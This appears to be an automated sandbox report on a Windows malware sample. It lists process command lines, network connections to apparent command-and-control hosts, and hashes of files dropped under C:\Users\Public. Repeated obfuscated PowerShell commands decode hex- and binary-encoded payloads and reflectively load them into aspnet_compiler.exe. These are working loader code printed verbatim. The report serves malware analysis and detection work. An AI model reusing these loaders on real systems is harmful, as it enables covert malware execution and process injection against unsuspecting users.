C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); ""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "function fromHex { param([string] $str)$hex = $str.Split(\" \"); $result = New-Object \"byte[]\" ($hex.Count / 2);$count = 0; for ($i = 0; $i -lt $hex.Count - 1; $i += 2){ $result[$count] = [byte]($hex[$i]); $count++;}return $result };$runpe = (Get-Content -Path \"C:\\Users\\Public\\get.txt\");$runpeD = fromHex $runpe;$m = (Get-Content -Path \"C:\\Users\\Public\\load.dll\");$L = (Get-Content -Path \"C:\\Users\\Public\\B.txt\");$B = (Get-Content -Path \"C:\\Users\\Public\\L.txt\");$json = (Get-Content -Path \"C:\\Users\\Public\\json.txt\");[System.Reflection.Assembly]::$m([byte[]]$runpeD).GetType($B).GetMethod($L).Invoke($null, [int[]](0));[System.IO.File]::WriteAllText($json, $sc); "

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\run.js

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\run.js

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"

C:\Users\Public\node.exe

"C:\Users\Public\node.exe" C:\Users\Public\run.js

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 45.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
PL 45.80.158.168:222 45.80.158.168 tcp
US 8.8.8.8:53 168.158.80.45.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 195.177.78.104.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 36.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 48.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 62.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 55.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 61.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 67.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 80.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 nodejs.org udp
US 104.20.23.46:443 nodejs.org tcp
US 8.8.8.8:53 46.23.20.104.in-addr.arpa udp
US 8.8.8.8:53 28.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 83.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 torrentmoviess.com udp
TR 78.161.57.95:5552 torrentmoviess.com tcp
TR 78.161.57.95:5552 torrentmoviess.com tcp
US 8.8.8.8:53 windows11.loseyourip.com udp
NL 91.92.252.68:1177 windows11.loseyourip.com tcp
US 8.8.8.8:53 68.252.92.91.in-addr.arpa udp
US 8.8.8.8:53 204.201.50.20.in-addr.arpa udp

Files

memory/2388-5-0x0000015D511B0000-0x0000015D511D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_31ocissr.o4q.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2388-10-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

memory/2388-11-0x0000015D50880000-0x0000015D50890000-memory.dmp

memory/2388-12-0x0000015D512E0000-0x0000015D51306000-memory.dmp

memory/2388-13-0x0000015D51310000-0x0000015D51324000-memory.dmp

memory/2388-14-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

memory/2388-15-0x0000015D50880000-0x0000015D50890000-memory.dmp

memory/2388-16-0x0000015D50880000-0x0000015D50890000-memory.dmp

memory/2388-17-0x0000015D51370000-0x0000015D51382000-memory.dmp

memory/2388-18-0x0000015D50870000-0x0000015D5087A000-memory.dmp

C:\Users\Public\node_modules\async\reduce.js

MD5 724bb52915e1158b4dff6f26ef4baf72
SHA1 ad0aa6a0ac5576433051167524923e6aa794c96a
SHA256 f1e4594194164d2504946c85c8e983346b25f9be8239178defec27e912b56c21
SHA512 657c3dec82c5c6c34accdbc9d96e2be59a592e60241960810f10a662f5305c21dcef8cf006fcdefb0d48d30ccdd30d9dd6c263c089a88591f18a83a2f390eaaa

C:\Users\Public\node_modules\lodash\fp\property.js

MD5 ebb08110bff348df334274bd1d79e025
SHA1 563c5eb1769785a3350bfd1cb2b4e090a650c994
SHA256 af3533640c8af8f6804e9df53cabeac7767cddf1a619236e7226a784a2e9101a
SHA512 5f613471f700f4d36a3847f694774f9db9b7ebafd5037c00268af6edbf762bdad13a713dda2f93ab5f02bb01e8cdde2d6919f33a1bd1d74899bf1bf130b3fc73

C:\Users\Public\node_modules\lodash\valueOf.js

MD5 3b889e721c9c14f7a5cd312bb476f2a6
SHA1 dcaa02fb24d8915128f62a50e2782e30d7d4fe8e
SHA256 469f0f647beaf4eeca8d316133bcd0a0b3f5e55a4c1a391da1f10baba824ca9d
SHA512 3590cd3433b362223d3256d29a851a056c09d0fc0f4414d194cf39b64d166841dffd59f3029c352991682e9ee8e06fc97855fa1cefeb209098428dc5c2c7f953

C:\Users\Public\node_modules\zip-stream\LICENSE

MD5 51478cb9e7ab40d3d3616c3794ded96b
SHA1 97caa58bbe0c8dcd3bd857dca51ab034344a71c1
SHA256 79bad9f51738814f83251ae89460326b2ff2ea19ff5f71ab8f7636b2e17bb231
SHA512 e0eb64b4b3e53390e54487234f5dd7555e9a5871e9d1e901f5c0bdf8d9670b220731d2bf58c80e57a6e28e93fc7574ece6b4d449a13c51c05619bfa0bf2774e3

memory/2388-3007-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

C:\Users\Public\basta.js

MD5 38affda935585ad2ddc0abe0a906f404
SHA1 8379070ec3e9b448499c53c6244c815bc566cf59
SHA256 f1c6fbb11607690d7de83308bb65b7fdd0679591c2fc5bc927820b654a483eaa
SHA512 0520a8d53a2bc686a87c530680afa2f12eab198316e3d7419f472515bac0b0d2a3c891b0e4f3112b1f382d799f4655aa06624c57f06c2bc1cc3161ff06aeced6

C:\Users\Public\node.bat

MD5 1beb518fe0cd85f2d6f9101c2e47c7ae
SHA1 65ab6ae5b983633f60a4404636c0de19b2c529fa
SHA256 81ae13af20a68b407c4171c498f5140f51d8f0d9cf5bf4ddcf989112e3d31297
SHA512 880534df1232044cf1cfd5dc83a3d170eac46093c8f38b19e20967cb6b2c5020994d1f3113e72a4e73917ae6f9701c4a08f57f8ebec2471e35a9111362115d5b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 e5ab5d093e49058a43f45f317b401e68
SHA1 120da069a87aa9507d2b66c07e368753d3061c2d
SHA256 4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74
SHA512 d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a

memory/1440-3011-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

memory/1440-3012-0x000002DBAA580000-0x000002DBAA590000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 176e06d925350cd4e4fe35470be810d9
SHA1 60e4033d866f64faa490dad93552ec221a7c3db9
SHA256 1db23e1c00caceb52423a6e78b3923eb6cbde8fc9c5ca86ae88b717a433ddbb4
SHA512 6f661ba92185d85329b119944ec5098bb0b05d2c00ed3353b5a21639caef921033634706083fe7b7a8d09a65d71b7f4e9d07b4f33740a30d38ef6b7fc21d50b1

memory/1440-3023-0x000002DBAB0B0000-0x000002DBAB0D6000-memory.dmp

memory/1440-3024-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

memory/1616-3025-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

memory/1616-3032-0x000001C1DFEE0000-0x000001C1DFEF0000-memory.dmp

memory/1616-3036-0x000001C1DFEE0000-0x000001C1DFEF0000-memory.dmp

memory/1616-3038-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

C:\Users\Public\app.js

MD5 3f5daf5315fe8b83fdc8a6d0265008b6
SHA1 4a08dd25e8fbb547c23e888e3dd009910cdc3cc5
SHA256 46286370fb97d1b63b3b9ee3b79e8bb0b5072d6e17d11470592e1e0d8586e0c6
SHA512 93f2700a5e7d5e4b9da7aeb470d261f38a76a54f2bfeb08657bfc5a8f05ce3d583dda2790e441e62acc5de9594fe745f3ae0a6de74564776978c88aadeee86f8

C:\Users\Public\open.js

MD5 3a6537ac98b7cdb20f6ea4f86a76704e
SHA1 ff696860120a820dd728de2f33cb0d2b3d3abab5
SHA256 340c15e404619ed7d2c158c8956c1c44dfa2649fbb33c72e043bd538d35b153c
SHA512 e75ee3e67f37fe614b6636db3e32f335c8196a98de923ba5a516fb5eb36b7421756dfa888d4d1949a32debd5d9f331159f69d51ec796f7fa48e4a8ae4e8ce3db

C:\Users\Public\run.js

MD5 166e57b73fd399b0f54c415d22b235f6
SHA1 f20bf715826dc97a5e26c7acc4310d32213cc2b7
SHA256 f7741744738c58c8cd5b1b8bc756860a68a8b3378576c421f0f597edf29f5df3
SHA512 e2a32241f607f0b6842ca2546002ad086035161249bd2dd3bf04a05dcbf6ad660ef91d23507c0f0c983769ade7d73d0b627b8c16c31954e607b4261b89979eda

C:\Users\Public\package.json

MD5 561b0767d774c4ee83cff11195bf0f78
SHA1 f2106c79a585a699a70bd7bdf8e49425d0230fd7
SHA256 10a2973b3545db3ea55c71f241676db0825c1cdecd1ef070a0c71b56b48f33ca
SHA512 7e99c9f6ae3bcfe2f8c730dd7274bd7cfca87a76625af6be72a60b09fe48261b3240b051bad4c3c0bdc5781c3ecd730766cd83ef936ee4d5d08aec911e181dd2

memory/5008-3046-0x00007FF8AEEA0000-0x00007FF8AF961000-memory.dmp

memory/5008-3047-0x000001BCDB240000-0x000001BCDB250000-memory.dmp

memory/5008-3048-0x000001BCDB240000-0x000001BCDB250000-memory.dmp

C:\Users\Public\get.js

MD5 e2bc3600ad058e027ace3294ce01586d
SHA1 292aa8885f06a5ceeab9178db111f5f490e7f70b
SHA256 89bc4198cca19c7caa04186e8209223aa0b56efeac5fbb9235bbdb889cf69297
SHA512 971a1fe6f03060e95c56556942f5d70043f30992e40105b742af0cbbef0ad51096fc35e529dfd518ce5ffe7678771dfd9792868b1f37dcc9af34e598675f4e46

C:\Users\Public\node_modules\brace-expansion\index.js

MD5 795f787be90f6daf96d64087f2428723
SHA1 6c479385902b5adc1b4343472922324aa312296c
SHA256 6f6a12f42623bf53b6561d46c5e37c0f26b6471ba53e83c3b933fb2c2f139742
SHA512 f093a66ef5f0e79085195571421a3ebc7681bbe41add742fb5a7efbd660fc3f6ccd6e6c8a95c4334a91232b6e0a45aebb84539ef7fef05fa21c63e36d2757175

C:\Users\Public\node_modules\lazystream\node_modules\safe-buffer\index.js

MD5 b1622ff2944ba3f13a1cf6fbcf0f9e3f
SHA1 f67b8decb99eed068f28c9ae56df08c21bf4c33d
SHA256 d58af21cb0518864d0c505742d1af71e5b5e1f142f4c0f27353aa0f431a616d4
SHA512 600b49f49832ee51ffd8f6c99616387d93bb1fc2afee71d2066f982e39080a1508999ef2e2bf714d5f6adabaa8b72d3c5cdb445c8c36b67064dd76b377b7f889

C:\Users\Public\node_modules\lodash\_setToString.js

MD5 f1fa947e65c65677eb4f67e84b8a6c2f
SHA1 525d4e7a92d2f5de834b7199c926bf05e5863e02
SHA256 86eee99d2a2d984255dd6c7d3ac25ab918808e9777311acf7fbc3adbd45879e7
SHA512 cc2a29187e11f57a8e5e17d4d478fb7a8bfdd8af4a3710d05fcb7cdc12a47e727df6f098d20313353525486ed456bc585ca435d96b461840fe4a662a8365cc8f

C:\Users\Public\node_modules\lodash\_apply.js

MD5 d3ef9e89ba499ebaba74672b935bcc26
SHA1 cf8c13531bb2ebaaa912ed42cd51d35749780b49
SHA256 5ca933653821ae52ba593356d8c761624ed66f0b40860c7648a3acf278f0596a
SHA512 6edf5feb412d0ce6b4f108dc8a663d9d316437fbda6c16ca8069ff984629217b6e646b631ec28eae5d3d85d2adcb32a25d1befc74aa0337c9e36028338a6ec81

C:\Users\Public\node_modules\lodash\_overRest.js

MD5 bfe15354abfbe418be549eebae30d074
SHA1 7020d98e117801d3a38b53367295588fe9574282
SHA256 8833534359cb66fde3c020f57e1280f9626c806088e6b9eaf51953b3c849ce36
SHA512 70712445eeb1b0ac58d00ae073aebfa3a77c33c1858eeec5860a39ab012e9f8865a0412a45848d238b91a9a5cd61afa43ab6ac78361f67ec74de70725d221653

C:\Users\Public\node_modules\lodash\identity.js

MD5 8dd2f4d084e0eed07ef8f0595ed55fe8
SHA1 af8a8f8af76663a408cf9f29e5723d05f79eb236
SHA256 b356675eecf6085c57d8c5c9c9bec57235513e42cad616477a1205a488f3d9d5
SHA512 9e50bf4913709a383bb75d70503d6af38472dee21ee7dc3233710d6f2d6e11b479f3a03fecae46d7037193f454761da85e319844261d6e8b0ddc353c9c4b5df4

C:\Users\Public\node_modules\lodash\_baseRest.js

MD5 1458f0c78cdd63a2dfe50b7b16b9c777
SHA1 e31a38bffa598aef97317e7b1970a212a4d44d00
SHA256 4945f6523dc4a6b9af9a470772863f5b0ab917c28d33b99530c736e0cf6e09ef
SHA512 7d5955740f8a846e6a3794f8399a18e0cf735f23a73bc676362d6d77ec4135e2722320ffb19b4ff61739f66a4a90aa0aa5c51d72881df4222126a9f91701bfdf

C:\Users\Public\node_modules\lodash\defaults.js

MD5 06d4d683bd2d2884d904123294691819
SHA1 1f12f29efd3d103440d5c2cf8895119205ec67eb
SHA256 8404d7524bdda84422c7d9c5df4570f2d98d9caf21bf5ea29b00acf54bc97e50
SHA512 23f7415a74dd1dde13414dd0c4b2b78d93f15d82176bddea70d337bb35c0ea15309c7fcab4986d218493e0784fbd98152a8d8ead0caaa014b8a3e094208eeac7

C:\Users\Public\node_modules\lodash\package.json

MD5 188f386c15507c982c3e0d5a2db5b60d
SHA1 2c1ec9f730323c72f6f76e73f48b24902cc853c2
SHA256 8e41b07c744a0de0d2c1c23ed41418ecb0849abb56395d28802e601b4730d7c2
SHA512 a9a582ec1711e2dd19d80b43288821709641e310a44657d6dfe0b4b98644a33f6c9720e89a17516cbafa38518bf71653402b1fede5b2cf18dfe9859ed3973e5f

C:\Users\Public\node_modules\normalize-path\index.js

MD5 1f9d17bf8e9a13b67f2c2445de5a732b
SHA1 7af46f52994266092fb6890723ef7e1b059d1d20
SHA256 202cf63677ddcac13e71d66d2e98c8f07aad10789845ade028e5be755b7abf3a
SHA512 9ef3f1c6940baecc07f4b4a1e01c418f9f674ad38bd08f784202c6ab9ddae552652cef661ad8ee72b636c366930dd107fd753afe2fdb632dd9ff49e8664df22d

C:\Users\Public\node_modules\normalize-path\package.json

MD5 8a437fdddf8bae5cce39556e3f830975
SHA1 fc704b76301681294309df4f3936e4e5e1657e55
SHA256 284ea445a01a454ab1235a08101445fe16592303167090815f4a75b54d6fba04
SHA512 bb797f8029ea492c6894e5f3b43b22090d090f49df008c82cc10f4ac07fc757ef363e26e5832b8c409b955b3780db34d6755fdb8205a33e1af07dcee19a1d116

C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_passthrough.js

MD5 5dcada23e7d0fed2ac8320a06f0d7057
SHA1 38fe3358505ae4667dfc1f7fdaf09c4a35eef7e9
SHA256 bf61450b1ff5f94fea9d46665e931119642034c903e63cc224b4c96472eed4d4
SHA512 a8b896641c5021fe0416e1bcd3189ee8061100f78957f06055f2d8b68fa8dc5a53784cd204f04561af14deb6349f55777d393710f8c1192c5b69a84c31584a36

C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_transform.js

MD5 9cbd9508cad163ef01dad4cee030897b
SHA1 52bbdae8d18908d8783c49ff2dc5803e7256c541
SHA256 56220d9dd58b976f1739bfc85948b267d79772ba23672ff402d13b6b3fcf4e40
SHA512 910af29c89b4114ad09e287c7d347538d494ec88095b80185a2f5bfb4febab54b337c328e2a05b4bab6bc9a3fa7447d00d07cee54e42e34c88f0ef0138289e42

C:\Users\Public\node_modules\lazystream\node_modules\readable-stream\lib\_stream_duplex.js

MD5 53328d86ad3de15e7a1b48f4772890a6
SHA1 5c9979ad235f24ffec84966ca764457a6a8fb933
